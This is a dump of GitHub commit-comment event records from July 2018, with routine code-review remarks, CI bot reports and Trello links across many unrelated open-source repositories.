{"id":"7966007494","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29709755,"position":8,"line":120,"path":"src/vm/jvm/Truffle.nqp","commit_id":"0d726f8b05c86ff5d63fe459fde2c97753e7283a","created_at":"2018-07-14T16:19:01Z","updated_at":"2018-07-14T16:19:01Z","author_association":"CONTRIBUTOR","body":"I see $handler might be assigned 0 later in an if, but I don't see it being used at all?"}},"created_at":"2018-07-14T16:19:01Z"}
{"id":"7966019943","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29709781,"position":null,"line":null,"path":null,"commit_id":"2568c07757449d56a0fb3ba3ae9762edb2766f1c","created_at":"2018-07-14T16:28:55Z","updated_at":"2018-07-14T16:28:55Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-127](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-127).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-127-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-14T16:28:55Z"}
{"id":"7966020101","type":"CommitCommentEvent","actor":{"login":"Nicofisi"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29709782,"position":null,"line":null,"path":null,"commit_id":"880e3de132ab0f6eb24d10819118f037a1b906de","created_at":"2018-07-14T16:29:03Z","updated_at":"2018-07-14T16:29:03Z","author_association":"CONTRIBUTOR","body":"2 space indentation is one of the best things about Scala one you get used to it lol"}},"created_at":"2018-07-14T16:29:03Z"}
{"id":"7966020715","type":"CommitCommentEvent","actor":{"login":"NailPlay"},"repo":{"name":"NailPlay/FunBox"},"payload":{"comment":{"id":29709783,"position":4,"line":4,"path":"README.md","commit_id":"a0a3a26440729595db3d99834a3ba7f4cc7f8cea","created_at":"2018-07-14T16:29:33Z","updated_at":"2018-07-14T16:29:33Z","author_association":"OWNER","body":"-"}},"created_at":"2018-07-14T16:29:33Z"}
{"id":"7966023894","type":"CommitCommentEvent","actor":{"login":"chalin"},"repo":{"name":"dart-lang/pub_semver"},"payload":{"comment":{"id":29709789,"position":6,"line":6,"path":".travis.yml","commit_id":"7b2549d1f57d9311f5525c761ce7627bdb6e6d27","created_at":"2018-07-14T16:31:44Z","updated_at":"2018-07-14T16:31:44Z","author_association":"NONE","body":"@kevmoo - do we still need to explicitly test under 1.21.1?"}},"created_at":"2018-07-14T16:31:44Z"}
{"id":"7966024107","type":"CommitCommentEvent","actor":{"login":"Qix-"},"repo":{"name":"zeit/wait-for"},"payload":{"comment":{"id":29709790,"position":69,"line":258,"path":"wait-for.c","commit_id":"c6b032ae2fbebd11c1aa68e5566fa2b4e04ae796","created_at":"2018-07-14T16:31:54Z","updated_at":"2018-07-14T16:31:54Z","author_association":"COLLABORATOR","body":"Prefix with `error:`"}},"created_at":"2018-07-14T16:31:54Z"}
{"id":"7966025653","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29709797,"position":null,"line":null,"path":null,"commit_id":"bca28ceb04e591b164bd82e49986aa218477245f","created_at":"2018-07-14T16:33:05Z","updated_at":"2018-07-14T16:33:05Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-129](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-129).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-129-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-14T16:33:05Z"}
{"id":"7966025802","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29709798,"position":1,"line":1,"path":"5.python3 string decode and encode","commit_id":"3ffafdfe690b8f92c8a81bbab9954858fe643ac6","created_at":"2018-07-14T16:33:13Z","updated_at":"2018-07-14T16:33:13Z","author_association":"OWNER","body":"### In python2 the default string is encode by Ascii, in python3, the default is Unicode:\r\n```\r\n#Downtiser\r\nimport sys\r\nprint(sys.getdefaultencoding())\r\ns='你好呀'\r\ns_to_gbk=s.encode('gbk')\r\nprint('s convert to gbk>>>',s_to_gbk)\r\nprint('s convert to utf-8>>>',s.encode())\r\n\r\ns_to_utf8=s_to_gbk.decode('gbk').encode('utf-8')\r\nprint('s convet to gbk then convert to utf-8>>>',s_to_utf8)\r\n```\r\n>>>\r\nutf-8\r\ns convert to gbk>>> b'\\xc4\\xe3\\xba\\xc3\\xd1\\xbd'\r\ns convert to utf-8>>> b'\\xe4\\xbd\\xa0\\xe5\\xa5\\xbd\\xe5\\x91\\x80'\r\ns convet to gbk then convert to utf-8>>> b'\\xe4\\xbd\\xa0\\xe5\\xa5\\xbd\\xe5\\x91\\x80'\r\n"}},"created_at":"2018-07-14T16:33:13Z"}
{"id":"7966028509","type":"CommitCommentEvent","actor":{"login":"shingoushori"},"repo":{"name":"shingoushori/simutrans"},"payload":{"comment":{"id":29709802,"position":null,"line":null,"path":null,"commit_id":"0401ff3e97f57dcbc425beffbdae981f9a5351ba","created_at":"2018-07-14T16:35:20Z","updated_at":"2018-07-14T16:35:20Z","author_association":"OWNER","body":"↓here is the fundamental modification of this commit\r\nhttps://github.com/shingoushori/simutrans/commit/434f88d8b170a4d34824b19d843d05865679d499"}},"created_at":"2018-07-14T16:35:20Z"}
{"id":"7966028898","type":"CommitCommentEvent","actor":{"login":"shingoushori"},"repo":{"name":"shingoushori/simutrans"},"payload":{"comment":{"id":29709803,"position":null,"line":null,"path":null,"commit_id":"434f88d8b170a4d34824b19d843d05865679d499","created_at":"2018-07-14T16:35:37Z","updated_at":"2018-07-14T16:35:37Z","author_association":"OWNER","body":"↓here is the efficient modification of this commit\r\nhttps://github.com/shingoushori/simutrans/commit/0401ff3e97f57dcbc425beffbdae981f9a5351ba"}},"created_at":"2018-07-14T16:35:37Z"}
{"id":"7966030604","type":"CommitCommentEvent","actor":{"login":"splintah"},"repo":{"name":"splintah/game-of-life"},"payload":{"comment":{"id":29709806,"position":null,"line":null,"path":null,"commit_id":"7fb8d14ed87115fe537a993ff2d7c5f8e834832b","created_at":"2018-07-14T16:36:55Z","updated_at":"2018-07-14T16:36:55Z","author_association":"OWNER","body":"> We could probably use Rule to support different rules when actually updating the board.\r\n\r\nThat was the idea :)"}},"created_at":"2018-07-14T16:36:55Z"}
{"id":"7966030653","type":"CommitCommentEvent","actor":{"login":"msm1252"},"repo":{"name":"msmb4u/MyRepo2"},"payload":{"comment":{"id":29709807,"position":null,"line":null,"path":null,"commit_id":"2f551c813f76dab15f04c068db61d1854fa265bc","created_at":"2018-07-14T16:36:58Z","updated_at":"2018-07-14T16:36:58Z","author_association":"COLLABORATOR","body":"Need to do code review"}},"created_at":"2018-07-14T16:36:58Z"}
{"id":"7966030777","type":"CommitCommentEvent","actor":{"login":"ozak"},"repo":{"name":"geopandas/geopandas"},"payload":{"comment":{"id":29709808,"position":null,"line":null,"path":null,"commit_id":"deaa2da983030512e200237a14dd450a888f38a7","created_at":"2018-07-14T16:37:04Z","updated_at":"2018-07-14T16:37:04Z","author_association":"NONE","body":"Is there a reason to get rid of automatic reprojection? Without out it, if you have different crs you get an empty data frame, no errors and you end up wondering what's going on. "}},"created_at":"2018-07-14T16:37:04Z"}
{"id":"7966031188","type":"CommitCommentEvent","actor":{"login":"funkwallace"},"repo":{"name":"funkwallace/ClickGrid"},"payload":{"comment":{"id":29709809,"position":null,"line":null,"path":null,"commit_id":"83596c9ef05d77fda27b018f328d271a3647a4dc","created_at":"2018-07-14T16:37:23Z","updated_at":"2018-07-14T16:37:23Z","author_association":"OWNER","body":"Also added dragNode to ClickGrid, to separately track a dragged Node vs. just activeNode. Helped avoid dragged Node from jumping to other activeNode. Should keep this addition; it's better organized."}},"created_at":"2018-07-14T16:37:23Z"}
{"id":"7966031589","type":"CommitCommentEvent","actor":{"login":"alejandro-isaza"},"repo":{"name":"TrustWallet/trust-core"},"payload":{"comment":{"id":29709811,"position":14,"line":38,"path":"Sources/Ethereum/EthereumAddress.swift","commit_id":"9334767239a5f2f141e64dac9966bb54f249f425","created_at":"2018-07-14T16:37:40Z","updated_at":"2018-07-14T16:37:40Z","author_association":"COLLABORATOR","body":"I don't think we should call this a blockchain, it's confusing. Maybe call it a coin instead? @vikmeup "}},"created_at":"2018-07-14T16:37:40Z"}
{"id":"7966032251","type":"CommitCommentEvent","actor":{"login":"nichcream"},"repo":{"name":"nichcream/android_device_xiaomi_land"},"payload":{"comment":{"id":29709813,"position":225,"line":19,"path":"libshims/bionic/pthread_cond.cpp","commit_id":"1a91dc38940399817ac270e4a75af3c2b7de7d8f","created_at":"2018-07-14T16:38:08Z","updated_at":"2018-07-14T16:38:08Z","author_association":"OWNER","body":"U r the biggest pain in my life."}},"created_at":"2018-07-14T16:38:08Z"}
{"id":"7966032259","type":"CommitCommentEvent","actor":{"login":"gustavnikolaj"},"repo":{"name":"gustavnikolaj/async-main-wrap"},"payload":{"comment":{"id":29709814,"position":null,"line":null,"path":null,"commit_id":"6a9b8543b71b7ab410a1d274143d025f1e25984e","created_at":"2018-07-14T16:38:09Z","updated_at":"2018-07-14T16:38:09Z","author_association":"OWNER","body":"Released as version 2.0.0 :-)"}},"created_at":"2018-07-14T16:38:09Z"}
{"id":"7966032374","type":"CommitCommentEvent","actor":{"login":"xBlueSI"},"repo":{"name":"xBlueSI/esx_personmeny"},"payload":{"comment":{"id":29709815,"position":null,"line":null,"path":null,"commit_id":"4e69777e79351fc201f7be0d850cf2f06a5db0bd","created_at":"2018-07-14T16:38:13Z","updated_at":"2018-07-14T16:38:13Z","author_association":"OWNER","body":"The boss menu included by a misstake! It will be something to the future! \r\nFeels bad to show that the menu was taken from another skript. xD\r\n"}},"created_at":"2018-07-14T16:38:13Z"}
{"id":"7966032726","type":"CommitCommentEvent","actor":{"login":"salmanulfarzy"},"repo":{"name":"eendroroy/alien"},"payload":{"comment":{"id":29709816,"position":null,"line":null,"path":null,"commit_id":"7f6bd2b6a6254b24c77985a1e875094e493918cc","created_at":"2018-07-14T16:38:29Z","updated_at":"2018-07-14T16:38:29Z","author_association":"NONE","body":"Why prefer `date` instead of `Zsh` provided [date and time](http://zsh.sourceforge.net/Doc/Release/Prompt-Expansion.html#Date-and-time) with additional format support ?"}},"created_at":"2018-07-14T16:38:29Z"}
{"id":"7966033468","type":"CommitCommentEvent","actor":{"login":"alejandro-isaza"},"repo":{"name":"TrustWallet/trust-core"},"payload":{"comment":{"id":29709817,"position":6,"line":57,"path":"Sources/Ethereum/EthereumAddress.swift","commit_id":"3c07727a0b7a521d9a0e90fa45cda474beaa212e","created_at":"2018-07-14T16:38:59Z","updated_at":"2018-07-14T16:38:59Z","author_association":"COLLABORATOR","body":"We should make this init non-optional then. @vikmeup "}},"created_at":"2018-07-14T16:38:59Z"}
{"id":"7966034204","type":"CommitCommentEvent","actor":{"login":"splintah"},"repo":{"name":"splintah/game-of-life"},"payload":{"comment":{"id":29709820,"position":null,"line":null,"path":null,"commit_id":"d99858567dad6dd122df02dcf16061506026b8b0","created_at":"2018-07-14T16:39:31Z","updated_at":"2018-07-14T16:39:31Z","author_association":"OWNER","body":"> Performance sadly did deteriorate from 750.000 ns/iter to 810.000 ns/iter.\r\n\r\nThat might be due to the use of `usize`... Its size is on 64-bit machines is double the size of `i32`."}},"created_at":"2018-07-14T16:39:31Z"}
{"id":"7966034871","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29709822,"position":12,"line":124,"path":"src/vm/jvm/Truffle.nqp","commit_id":"0d726f8b05c86ff5d63fe459fde2c97753e7283a","created_at":"2018-07-14T16:40:02Z","updated_at":"2018-07-14T16:40:02Z","author_association":"CONTRIBUTOR","body":"Oh, also not sure what $label is for?"}},"created_at":"2018-07-14T16:40:02Z"}
{"id":"7966035367","type":"CommitCommentEvent","actor":{"login":"MrCrayfish"},"repo":{"name":"MrCrayfish/MrCrayfishVehicleMod"},"payload":{"comment":{"id":29709823,"position":null,"line":null,"path":null,"commit_id":"59ff9a2b797ec043d727dd5bebb3ff35f6f6a546","created_at":"2018-07-14T16:40:22Z","updated_at":"2018-07-14T16:40:22Z","author_association":"OWNER","body":"I've gotten into the habbit of never writing them anyone because Intellij always reminds me I shouldn't do this.  Which IDE are you using?"}},"created_at":"2018-07-14T16:40:22Z"}
{"id":"7966039464","type":"CommitCommentEvent","actor":{"login":"double-beep"},"repo":{"name":"Counterply/asmFish"},"payload":{"comment":{"id":29709831,"position":null,"line":null,"path":null,"commit_id":"c11dab61092fac259b20d14d93930afae7f74cc6","created_at":"2018-07-14T16:43:26Z","updated_at":"2018-07-14T16:43:26Z","author_association":"NONE","body":"@Counterply yes it works well for me and for AppVeyor as I see! Congrats!"}},"created_at":"2018-07-14T16:43:26Z"}
{"id":"7966040165","type":"CommitCommentEvent","actor":{"login":"Byyunpeng"},"repo":{"name":"Byyunpeng/work"},"payload":{"comment":{"id":29709834,"position":null,"line":null,"path":null,"commit_id":"df5c14270ec37231739b6f0f78d512a9bca1ee2e","created_at":"2018-07-14T16:43:56Z","updated_at":"2018-07-14T16:43:56Z","author_association":"OWNER","body":"阿萨德"}},"created_at":"2018-07-14T16:43:56Z"}
{"id":"7966040571","type":"CommitCommentEvent","actor":{"login":"tahulse"},"repo":{"name":"LMFDB/lmfdb"},"payload":{"comment":{"id":29709835,"position":null,"line":null,"path":null,"commit_id":"281640307314ffea069fdf99b1bfb1d2e488553f","created_at":"2018-07-14T16:44:13Z","updated_at":"2018-07-14T16:44:13Z","author_association":"NONE","body":"Though it was explained in a sentence at the end of the top paragraph, it was not immediately obvious how to navigate the Maass form browsing graph. Indeed, from the original subtitle (which had some redundancy with the main title) it wasn't obvious that the graph linked to pages for individual Maass forms at all, rather the page seemed to suggest that all the information available for each Maass form was just the spectral parameter and the level. \r\n\r\nI moved the line about \"clicking on a dot\" so that it would appear right above the graph and so the instructions are made more obvious, I also modified the subtitle to remove some redundancy and to deemphasize that this page is mainly meant to be a graph rather than a browsing portal. "}},"created_at":"2018-07-14T16:44:13Z"}
{"id":"7966041042","type":"CommitCommentEvent","actor":{"login":"markprime"},"repo":{"name":"markprime/tetrisClone"},"payload":{"comment":{"id":29709837,"position":120,"line":120,"path":"app/src/main/java/uk/co/projectprime/tetris/view/TetrisView.kt","commit_id":"a28989e1f139b34a3d00710f694e78a1f3dd12f8","created_at":"2018-07-14T16:44:33Z","updated_at":"2018-07-14T16:44:33Z","author_association":"OWNER","body":"drawCell(canvas, col, row, color as Int) correction to code"}},"created_at":"2018-07-14T16:44:33Z"}
{"id":"7966041961","type":"CommitCommentEvent","actor":{"login":"FokinAlex"},"repo":{"name":"nikon-petr/simple-api"},"payload":{"comment":{"id":29709838,"position":189,"line":189,"path":"src/main/java/edu/nikon/simpleapi/api/user/domain/User.java","commit_id":"58c9bb9d66479336f093250f518a50e59c264a04","created_at":"2018-07-14T16:45:13Z","updated_at":"2018-07-14T16:45:13Z","author_association":"NONE","body":"This override usless, cuz you can use MediaType's constants in you controllers:\r\n1. (a)RequestMapping(..., produces = APPLICATION_JSON_VALUE)\r\n2. Do request \r\n3. :question: :question: :question: \r\n4. PROFIT!"}},"created_at":"2018-07-14T16:45:13Z"}
{"id":"7966042252","type":"CommitCommentEvent","actor":{"login":"markprime"},"repo":{"name":"markprime/tetrisClone"},"payload":{"comment":{"id":29709840,"position":133,"line":133,"path":"app/src/main/java/uk/co/projectprime/tetris/view/TetrisView.kt","commit_id":"a28989e1f139b34a3d00710f694e78a1f3dd12f8","created_at":"2018-07-14T16:45:26Z","updated_at":"2018-07-14T16:45:26Z","author_association":"OWNER","body":" val bottom: Float = (frameOffset.height + (y + 1) * cellSize.height - BLOCK_OFFSET).toFloat()"}},"created_at":"2018-07-14T16:45:26Z"}
{"id":"7966042631","type":"CommitCommentEvent","actor":{"login":"markprime"},"repo":{"name":"markprime/tetrisClone"},"payload":{"comment":{"id":29709843,"position":134,"line":134,"path":"app/src/main/java/uk/co/projectprime/tetris/view/TetrisView.kt","commit_id":"a28989e1f139b34a3d00710f694e78a1f3dd12f8","created_at":"2018-07-14T16:45:42Z","updated_at":"2018-07-14T16:45:42Z","author_association":"OWNER","body":"val right: Float = (frameOffset.width + (x + 1) * cellSize.width - BLOCK_OFFSET).toFloat()"}},"created_at":"2018-07-14T16:45:42Z"}
{"id":"7966044251","type":"CommitCommentEvent","actor":{"login":"Synchro"},"repo":{"name":"PHPMailer/PHPMailer"},"payload":{"comment":{"id":29709844,"position":43,"line":1079,"path":"src/SMTP.php","commit_id":"f4d37028af4b2f596847534566344b21d9b48b0d","created_at":"2018-07-14T16:46:56Z","updated_at":"2018-07-14T16:46:56Z","author_association":"MEMBER","body":"If you search for the original PR for this, there was quite a discussion about it at the time. I’d recommend checking your open file limits - it’s common for default limits to be set very low in sysctl."}},"created_at":"2018-07-14T16:46:56Z"}
{"id":"7966044287","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709845,"position":null,"line":null,"path":null,"commit_id":"282293816e73aa87ad7c040929800293a11ebaad","created_at":"2018-07-14T16:46:57Z","updated_at":"2018-07-14T16:46:57Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - x86_64-MacOS-10.9-clang: Tests Failed (2493 of 2936 tests passed, 89 test warnings)\n\nMessages:\n\n * 523 tests had: EIO diffs.\n * 327 tests had: ESO big diffs.\n * 131 tests had: Table small diffs.\n * 192 tests had: ESO small diffs.\n * 127 tests had: SSZ small diffs.\n * 86 tests had: ZSZ small diffs.\n * 366 tests had: Table big diffs.\n * 97 tests had: AUD diffs.\n * 84 tests had: MTR big diffs.\n * 80 tests had: MTR small diffs.\n * 46 tests had: ERR diffs.\n * 101 tests had: ZSZ big diffs.\n * 13 tests had: SSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 180\n * Failed: 443\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-282293816e73aa87ad7c040929800293a11ebaad-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-282293816e73aa87ad7c040929800293a11ebaad-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-84.91%25-red.png)</a> \n"}},"created_at":"2018-07-14T16:46:57Z"}
{"id":"7966045127","type":"CommitCommentEvent","actor":{"login":"papandreou"},"repo":{"name":"gustavnikolaj/async-main-wrap"},"payload":{"comment":{"id":29709847,"position":null,"line":null,"path":null,"commit_id":"6a9b8543b71b7ab410a1d274143d025f1e25984e","created_at":"2018-07-14T16:47:40Z","updated_at":"2018-07-14T16:47:40Z","author_association":"NONE","body":"Thanks a lot!"}},"created_at":"2018-07-14T16:47:40Z"}
{"id":"7966045520","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/backward-cpp-feedstock"},"payload":{"comment":{"id":29709848,"position":null,"line":null,"path":null,"commit_id":"0470860a34dbc23a0be0c238887dd299854a7223","created_at":"2018-07-14T16:47:59Z","updated_at":"2018-07-14T16:47:59Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @bombela were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @bombela were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T16:47:59Z"}
{"id":"7966045757","type":"CommitCommentEvent","actor":{"login":"cejkato2"},"repo":{"name":"CESNET/Nemea-Modules"},"payload":{"comment":{"id":29709849,"position":null,"line":null,"path":null,"commit_id":"a24962df0a8e88d18d697073a5f434ab84615088","created_at":"2018-07-14T16:48:10Z","updated_at":"2018-07-14T16:48:10Z","author_association":"CONTRIBUTOR","body":"relates to https://github.com/CESNET/Nemea-Framework/issues/86"}},"created_at":"2018-07-14T16:48:10Z"}
{"id":"7966045825","type":"CommitCommentEvent","actor":{"login":"mikanmatsuri"},"repo":{"name":"mikanmatsuri/mikantaberu"},"payload":{"comment":{"id":29709850,"position":7,"line":3,"path":"index.html","commit_id":"bd68800da203cc97a4bc035d95670513c5707c28","created_at":"2018-07-14T16:48:13Z","updated_at":"2018-07-14T16:48:13Z","author_association":"OWNER","body":"威嚇だよ!やり直し!"}},"created_at":"2018-07-14T16:48:13Z"}
{"id":"7966046474","type":"CommitCommentEvent","actor":{"login":"mikanmatsuri"},"repo":{"name":"mikanmatsuri/mikantaberu"},"payload":{"comment":{"id":29709851,"position":7,"line":3,"path":"index.html","commit_id":"bd68800da203cc97a4bc035d95670513c5707c28","created_at":"2018-07-14T16:48:42Z","updated_at":"2018-07-14T16:48:42Z","author_association":"OWNER","body":"直したよ！"}},"created_at":"2018-07-14T16:48:42Z"}
{"id":"7966048835","type":"CommitCommentEvent","actor":{"login":"Duttch"},"repo":{"name":"potto007/unifi-parental"},"payload":{"comment":{"id":29709860,"position":null,"line":null,"path":null,"commit_id":"2d0c51ce466ce55cddf51bedbdffc3257c641db9","created_at":"2018-07-14T16:50:36Z","updated_at":"2018-07-14T16:50:36Z","author_association":"NONE","body":"Thanks for the excellent write-up.\r\n\r\nI followed the script, but getting a 502 Bad Gateway.  Looking at the nginx log:\r\n\r\nconnect() failed (111: Connection refused) while connecting to upstream, client: 10.0.0.75, server: 10.0.0.2, request: \"GET /favicon.ico HTTP/1.1\", upstream: \"https://127.0.0.1:4000/favicon.ico\", host: \"10.0.0.2:4000\", referrer: \"https://10.0.0.2:4000/\"\r\n\r\nDid you come across this.\r\n\r\nThanks"}},"created_at":"2018-07-14T16:50:36Z"}
{"id":"7966048956","type":"CommitCommentEvent","actor":{"login":"nikon-petr"},"repo":{"name":"nikon-petr/simple-api"},"payload":{"comment":{"id":29709862,"position":189,"line":189,"path":"src/main/java/edu/nikon/simpleapi/api/user/domain/User.java","commit_id":"58c9bb9d66479336f093250f518a50e59c264a04","created_at":"2018-07-14T16:50:42Z","updated_at":"2018-07-14T16:50:42Z","author_association":"OWNER","body":"This override for logging. It is not a JSON :rofl: "}},"created_at":"2018-07-14T16:50:42Z"}
{"id":"7966050093","type":"CommitCommentEvent","actor":{"login":"wquerales"},"repo":{"name":"wquerales/sample-cloud-native-toolchain-tutorial-20180712141046171"},"payload":{"comment":{"id":29709865,"position":null,"line":null,"path":null,"commit_id":"3e38c16aac32e7b0cf309d195b60f32ee9fbacb9","created_at":"2018-07-14T16:51:38Z","updated_at":"2018-07-14T16:51:38Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/fbb0f0c8-8c6c-4599-a39a-3360f753f007?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180712141046171\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/fd68156d-901f-4021-93eb-6ba2fa3b45c8?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180712141046171\") deployed [sample-cloud-native-toolchain-tutorial-20180712141046171](https://github.com/wquerales/sample-cloud-native-toolchain-tutorial-20180712141046171/releases/tag/deploy-ibm-yp-us-south-wquerales-marnagarage.com-test-20180714-165136 \"deploy-ibm-yp-us-south-wquerales-marnagarage.com-test-20180714-165136\") to [test](https://console.bluemix.net/apps/95a33ccb-c9ae-4f1d-9ecc-ad8a798774c4?env_id=ibm:yp:us-south \"ibm:yp:us-south:wquerales@marnagarage.com:test\"), including this commit"}},"created_at":"2018-07-14T16:51:38Z"}
{"id":"7966052082","type":"CommitCommentEvent","actor":{"login":"Rechi"},"repo":{"name":"Lunatixz/KODI_Addons"},"payload":{"comment":{"id":29709866,"position":21,"line":53,"path":"script.kodi.windows.update/default.py","commit_id":"0f0e0ccbb1a123f0d6b49bb66ca50608a2371bac","created_at":"2018-07-14T16:53:10Z","updated_at":"2018-07-14T16:53:10Z","author_association":"NONE","body":"`xbmc.getCondVisibility('system.platform.uwp') or 'Program Files/WindowsApps/XBMCFoundation.Kodi_' in xbmc.translatePath('special://xbmcbin/')`\r\n\r\nfirst part for v18, second part for desktop v17 version from store"}},"created_at":"2018-07-14T16:53:10Z"}
{"id":"7966053268","type":"CommitCommentEvent","actor":{"login":"jainkuniya"},"repo":{"name":"jainkuniya/zulip-mobile"},"payload":{"comment":{"id":29709867,"position":10,"line":41,"path":"src/common/PasswordInput.js","commit_id":"993236999b7e547ef7a84ad8075e4b18b1779051","created_at":"2018-07-14T16:54:09Z","updated_at":"2018-07-14T16:54:09Z","author_association":"OWNER","body":"ya! by mistake ."}},"created_at":"2018-07-14T16:54:09Z"}
{"id":"7966053437","type":"CommitCommentEvent","actor":{"login":"benmccann"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29709868,"position":226,"line":175,"path":"docs/userguide/filters.md","commit_id":"89f7e2bb8513292f6e081da3ee9afc136a5e6ed4","created_at":"2018-07-14T16:54:16Z","updated_at":"2018-07-14T16:54:16Z","author_association":"COLLABORATOR","body":"this should be `tech.tablesaw` instead of `com.github.lwhite1`. Not sure that `QueryHelper` exists anymore?"}},"created_at":"2018-07-14T16:54:16Z"}
{"id":"7966053884","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29709869,"position":null,"line":null,"path":null,"commit_id":"00c18ecf9ce8d05d76703f031d16c260e8147cac","created_at":"2018-07-14T16:54:39Z","updated_at":"2018-07-14T16:54:39Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar visualização de log para o ADM](https://trello.com/c/aiPBcbv4/222-implementar-visualiza%C3%A7%C3%A3o-de-log-para-o-adm)"}},"created_at":"2018-07-14T16:54:39Z"}
{"id":"7966054259","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29709870,"position":null,"line":null,"path":null,"commit_id":"3e84a007a934f030bfc81f4e527b473b65400f76","created_at":"2018-07-14T16:54:57Z","updated_at":"2018-07-14T16:54:57Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar visualização de log para o ADM](https://trello.com/c/aiPBcbv4/222-implementar-visualiza%C3%A7%C3%A3o-de-log-para-o-adm)"}},"created_at":"2018-07-14T16:54:57Z"}
{"id":"7966054898","type":"CommitCommentEvent","actor":{"login":"jainkuniya"},"repo":{"name":"jainkuniya/zulip-mobile"},"payload":{"comment":{"id":29709871,"position":10,"line":41,"path":"src/common/PasswordInput.js","commit_id":"993236999b7e547ef7a84ad8075e4b18b1779051","created_at":"2018-07-14T16:55:26Z","updated_at":"2018-07-14T16:55:26Z","author_association":"OWNER","body":"Actually my gradle is building and can't checkout to this branch & revert it right now. Will do after it finishes :)"}},"created_at":"2018-07-14T16:55:26Z"}
{"id":"7966056176","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29709875,"position":null,"line":null,"path":null,"commit_id":"ec6d12737dbfe23f3dd7529a2782df37913f41d3","created_at":"2018-07-14T16:56:21Z","updated_at":"2018-07-14T16:56:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [implement special combinations](https://trello.com/c/6woEItn2/22-implement-special-combinations)"}},"created_at":"2018-07-14T16:56:21Z"}
{"id":"7966056359","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29709876,"position":null,"line":null,"path":null,"commit_id":"405a30c6858c5e5b03360daa60d115be788de439","created_at":"2018-07-14T16:56:29Z","updated_at":"2018-07-14T16:56:29Z","author_association":"OWNER","body":"Build version: __`2.1.0-master.59`__ :crossed_fingers: [`master`](https://github.com/streamich/nano-css/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/59) :tada:"}},"created_at":"2018-07-14T16:56:29Z"}
{"id":"7966056402","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29709877,"position":null,"line":null,"path":null,"commit_id":"8a1e4b66258ffe7eaa1168f584e48d1a9f5070a2","created_at":"2018-07-14T16:56:30Z","updated_at":"2018-07-14T16:56:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [implement special combinations](https://trello.com/c/6woEItn2/22-implement-special-combinations)"}},"created_at":"2018-07-14T16:56:30Z"}
